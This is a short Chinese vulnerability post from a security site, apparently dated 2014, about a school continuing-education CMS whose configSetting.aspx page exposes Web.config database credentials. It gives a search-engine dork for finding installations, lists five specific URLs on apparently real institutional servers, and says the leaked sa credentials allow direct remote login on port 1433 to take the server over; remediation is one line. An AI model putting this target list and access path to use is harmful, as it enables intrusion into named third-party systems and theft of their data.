某成教管理CMS系统数据库连接信息泄露下载

来源:黑吧安全网 浏览:1057次 时间:2014-04-29
做网站找雨过天晴工作室

偶然发现的,不知道是哪个公司的,看有些登录页面上写的是江西百得科技有限公司,就只好写这个了...

百度或google关键字:intitle:成教管理系统

configSetting.aspx可以查看Web.config数据库连接信息

http://cj.xmut.edu.cn/cexmut/webConfigSet/configSetting.aspx?url=/login/index.aspx

http://www.zscj.com.cn/jxjy/webConfigSet/configSetting.aspx?url=/jxjy/login/index.aspx

http://210.43.0.25/webConfigSet/configSetting.aspx?url=/login/index.aspx
 

http://59.74.193.139/webConfigSet/configSetting.aspx?url=/login/index.aspx

http://120.203.1.254:1083/webConfigSet/configSetting.aspx?url=/login/index.aspx

还有一些,就不一一列举了

有sa权限,可以1433外连,直接拿下

修复方案:

目录访问限制一下